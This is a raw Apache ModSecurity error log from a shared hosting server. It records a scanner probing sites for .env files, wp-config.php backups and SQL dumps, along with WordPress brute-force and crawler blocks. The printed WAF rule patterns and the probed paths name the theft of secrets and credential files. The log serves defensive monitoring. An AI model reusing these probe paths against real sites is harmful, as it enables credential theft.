[Tue May 26 15:15:41.878240 2026] [security2:error] [pid 700087:tid 700266] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v2/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBxAAAADE"]
[Tue May 26 15:15:41.894946 2026] [security2:error] [pid 700087:tid 700324] [client 195.178.110.199:60332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/v3/.env"] [unique_id "ahVrxZPHQM4as9fEIIaBxQAAAGs"]
[Tue May 26 15:15:41.992561 2026] [security2:error] [pid 700087:tid 700336] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrxZPHQM4as9fEIIaBrQAAAHc"]
[Tue May 26 15:15:42.026369 2026] [security2:error] [pid 700087:tid 700303] [client 195.178.110.199:60208] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/html/.env"] [unique_id "ahVrxpPHQM4as9fEIIaBzgAAAFY"]
[Tue May 26 15:15:42.146471 2026] [security2:error] [pid 700087:tid 700259] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/var/www/.env"] [unique_id "ahVrxpPHQM4as9fEIIaB1gAAACo"]
[Tue May 26 15:15:42.210517 2026] [security2:error] [pid 700087:tid 700260] [client 195.178.110.199:60336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/web/.env"] [unique_id "ahVrxpPHQM4as9fEIIaB4AAAACs"]
[Tue May 26 15:15:42.271714 2026] [security2:error] [pid 700087:tid 700270] [client 195.178.110.199:37336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/website/.env"] [unique_id "ahVrxpPHQM4as9fEIIaB5gAAADU"]
[Tue May 26 15:15:42.286748 2026] [security2:error] [pid 700087:tid 700273] [client 195.178.110.199:60332] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.bak"] [unique_id "ahVrxpPHQM4as9fEIIaB6AAAADg"]
[Tue May 26 15:15:42.296443 2026] [security2:error] [pid 700087:tid 700331] [client 195.178.110.199:60354] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.old"] [unique_id "ahVrxpPHQM4as9fEIIaB6gAAAHI"]
[Tue May 26 15:15:42.339379 2026] [security2:error] [pid 700087:tid 700296] [client 195.178.110.199:60336] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/wp-content/mysql.sql"] [unique_id "ahVrxpPHQM4as9fEIIaB7QAAAE8"]
[Tue May 26 15:15:42.406992 2026] [security2:error] [pid 700087:tid 700221] [client 195.178.110.199:60308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php"] [unique_id "ahVrxpPHQM4as9fEIIaB8AAAAAQ"]
[Tue May 26 15:15:42.423588 2026] [security2:error] [pid 700087:tid 700251] [client 195.178.110.199:60224] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.pronumbers.com.au"] [uri "/wp-config.php.new"] [unique_id "ahVrxpPHQM4as9fEIIaB8QAAACI"]
[Tue May 26 15:15:44.584458 2026] [security2:error] [pid 700087:tid 700298] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVryJPHQM4as9fEIIaCIQAAAFE"]
[Tue May 26 15:15:46.155605 2026] [security2:error] [pid 700087:tid 700291] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVryZPHQM4as9fEIIaCRgAAAEo"]
[Tue May 26 15:15:49.474275 2026] [security2:error] [pid 700087:tid 700226] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrzZPHQM4as9fEIIaCnwAAAAk"]
[Tue May 26 15:15:51.095177 2026] [security2:error] [pid 700087:tid 700256] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVrzpPHQM4as9fEIIaCxAAAACc"]
[Tue May 26 15:15:51.269874 2026] [security2:error] [pid 700087:tid 700335] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVrzJPHQM4as9fEIIaCkwAAAHY"]
[Tue May 26 15:15:53.354572 2026] [security2:error] [pid 700087:tid 700309] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr0JPHQM4as9fEIIaC_gAAAFw"]
[Tue May 26 15:15:53.942399 2026] [security2:error] [pid 700087:tid 700287] [client 35.213.179.237:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVr0ZPHQM4as9fEIIaDIQAAAEY"]
[Tue May 26 15:15:54.759110 2026] [security2:error] [pid 700087:tid 700264] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr0pPHQM4as9fEIIaDMAAAAC8"]
[Tue May 26 15:15:56.953546 2026] [security2:error] [pid 700087:tid 700098] [remote 121.200.216.55:49384] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVr1JPHQM4as9fEIIaDhQAAJwo"]
[Tue May 26 15:15:57.531497 2026] [security2:error] [pid 700087:tid 700327] [client 57.141.2.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr1ZPHQM4as9fEIIaDiAAAAG4"]
[Tue May 26 15:15:59.563846 2026] [security2:error] [pid 700087:tid 700254] [client 143.105.136.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr15PHQM4as9fEIIaDxwAAACU"]
[Tue May 26 15:15:59.787123 2026] [security2:error] [pid 700087:tid 700319] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr15PHQM4as9fEIIaD1gAAAGY"]
[Tue May 26 15:16:01.431333 2026] [security2:error] [pid 700087:tid 700319] [client 114.119.146.77:28663] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ktmadvance-senegal.com"] [uri "/encaf/favicon.ico"] [unique_id "ahVr2ZPHQM4as9fEIIaEEAAAAGY"], referer: http://ktmadvance-senegal.com/encaf/favicon.ico
[Tue May 26 15:16:02.016198 2026] [security2:error] [pid 700087:tid 700326] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr2ZPHQM4as9fEIIaEFwAAAG0"]
[Tue May 26 15:16:02.417536 2026] [security2:error] [pid 700087:tid 700247] [client 114.119.139.115:23155] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/"] [unique_id "ahVr2pPHQM4as9fEIIaELQAAAB4"], referer: http://glorodavionics.com/index.php?route=product/category&path=72_17_71_99
[Tue May 26 15:16:03.168006 2026] [autoindex:error] [pid 700087:tid 700342] [client 185.247.137.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.glorodbalsa.com
[Tue May 26 15:16:03.617263 2026] [security2:error] [pid 700087:tid 700305] [client 31.57.184.107:50813] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.bycodetechnologies.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVr25PHQM4as9fEIIaEXAAAAFg"]
[Tue May 26 15:16:03.997795 2026] [security2:error] [pid 700087:tid 700259] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr25PHQM4as9fEIIaEYgAAACo"]
[Tue May 26 15:16:05.593220 2026] [security2:error] [pid 700087:tid 700324] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr3ZPHQM4as9fEIIaEjwAAAGs"]
[Tue May 26 15:16:06.350273 2026] [security2:error] [pid 700087:tid 700273] [client 66.249.64.174:36577] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "doyecpa.com"] [uri "/index.php"] [unique_id "ahVr3ZPHQM4as9fEIIaEkAAAADg"], referer: http://doyecpa.com/prizes/95233107
[Tue May 26 15:16:08.457900 2026] [security2:error] [pid 700087:tid 700265] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr4JPHQM4as9fEIIaE8wAAADA"]
[Tue May 26 15:16:10.534645 2026] [security2:error] [pid 700087:tid 700231] [client 43.173.175.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFSwAAAA4"]
[Tue May 26 15:16:10.649470 2026] [security2:error] [pid 700087:tid 700273] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFRQAAADg"]
[Tue May 26 15:16:10.738445 2026] [security2:error] [pid 700087:tid 700222] [client 43.172.196.211:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFXAAAAAU"]
[Tue May 26 15:16:10.751186 2026] [security2:error] [pid 700087:tid 700290] [client 43.173.177.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFWwAAAEk"]
[Tue May 26 15:16:10.760026 2026] [security2:error] [pid 700087:tid 700330] [client 43.173.182.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFWgAAAHE"]
[Tue May 26 15:16:10.765752 2026] [security2:error] [pid 700087:tid 700286] [client 43.173.177.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFXgAAAEU"]
[Tue May 26 15:16:10.773084 2026] [security2:error] [pid 700087:tid 700256] [client 43.173.179.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr4pPHQM4as9fEIIaFYQAAACc"]
[Tue May 26 15:16:11.757997 2026] [security2:error] [pid 700087:tid 700264] [client 43.172.196.97:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr45PHQM4as9fEIIaFjQAAAC8"]
[Tue May 26 15:16:11.950845 2026] [security2:error] [pid 700087:tid 700328] [client 189.151.237.234:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVr4ZPHQM4as9fEIIaFEgAAbzc"]
[Tue May 26 15:16:12.423195 2026] [security2:error] [pid 700087:tid 700244] [client 43.172.195.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVr5JPHQM4as9fEIIaFvgAAABs"]
[Tue May 26 15:16:12.594223 2026] [security2:error] [pid 700087:tid 700219] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr5JPHQM4as9fEIIaFtgAAAAI"]
[Tue May 26 15:16:12.988871 2026] [security2:error] [pid 700087:tid 700304] [client 114.119.130.152:38995] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "crusties.agsnails.com"] [uri "/kuokxwf/jobs-in-st-lucia-government"] [unique_id "ahVr5JPHQM4as9fEIIaF1gAAAFc"], referer: https://crusties.agsnails.com/kuokxwf/jobs-in-st-lucia-government
[Tue May 26 15:16:14.863857 2026] [security2:error] [pid 700087:tid 700296] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr5pPHQM4as9fEIIaGDAAAAE8"]
[Tue May 26 15:16:16.619953 2026] [security2:error] [pid 700087:tid 700262] [client 74.249.173.207:2566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.operatives.org.in"] [uri "/wk/index.php"] [unique_id "ahVr6JPHQM4as9fEIIaGSwAAAC0"]
[Tue May 26 15:16:17.256390 2026] [proxy:warn] [pid 700087:tid 700230] [client 66.132.186.197:62584] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 15:16:17.256427 2026] [proxy:error] [pid 700087:tid 700230] (70014)End of file found: [client 66.132.186.197:62584] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.186.197 ()
[Tue May 26 15:16:19.086490 2026] [security2:error] [pid 700087:tid 700273] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr6pPHQM4as9fEIIaGlwAAADg"]
[Tue May 26 15:16:19.696850 2026] [security2:error] [pid 700087:tid 700344] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr65PHQM4as9fEIIaGsAAAAH8"]
[Tue May 26 15:16:21.229835 2026] [security2:error] [pid 700087:tid 700286] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr7JPHQM4as9fEIIaG7wAAAEU"]
[Tue May 26 15:16:23.349920 2026] [security2:error] [pid 700087:tid 700296] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr7pPHQM4as9fEIIaHQwAAAE8"]
[Tue May 26 15:16:24.089726 2026] [security2:error] [pid 700087:tid 700287] [client 43.173.175.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr75PHQM4as9fEIIaHYAAAAEY"]
[Tue May 26 15:16:24.213510 2026] [security2:error] [pid 700087:tid 700233] [client 43.172.197.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVr8JPHQM4as9fEIIaHZAAAABA"]
[Tue May 26 15:16:25.597936 2026] [security2:error] [pid 700087:tid 700344] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr8ZPHQM4as9fEIIaHlAAAAH8"]
[Tue May 26 15:16:25.919088 2026] [security2:error] [pid 700087:tid 700116] [remote 65.1.132.161:61210] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 161.132.1.65.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVr8ZPHQM4as9fEIIaHvgAANBw"]
[Tue May 26 15:16:26.533845 2026] [security2:error] [pid 700087:tid 700322] [client 136.118.18.34:51188] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 34.18.118.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/xmlrpc.php"] [unique_id "ahVr8pPHQM4as9fEIIaH3AAAAGk"]
[Tue May 26 15:16:27.357281 2026] [security2:error] [pid 700087:tid 700265] [client 136.118.18.34:60453] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVr85PHQM4as9fEIIaH_gAAADA"]
[Tue May 26 15:16:28.024613 2026] [security2:error] [pid 700087:tid 700279] [client 136.118.18.34:53246] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVr9JPHQM4as9fEIIaIHAAAAD4"]
[Tue May 26 15:16:28.177633 2026] [security2:error] [pid 700087:tid 700290] [client 123.28.61.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr85PHQM4as9fEIIaICgAAAEk"]
[Tue May 26 15:16:28.188812 2026] [security2:error] [pid 700087:tid 700294] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr85PHQM4as9fEIIaIEAAAAE0"]
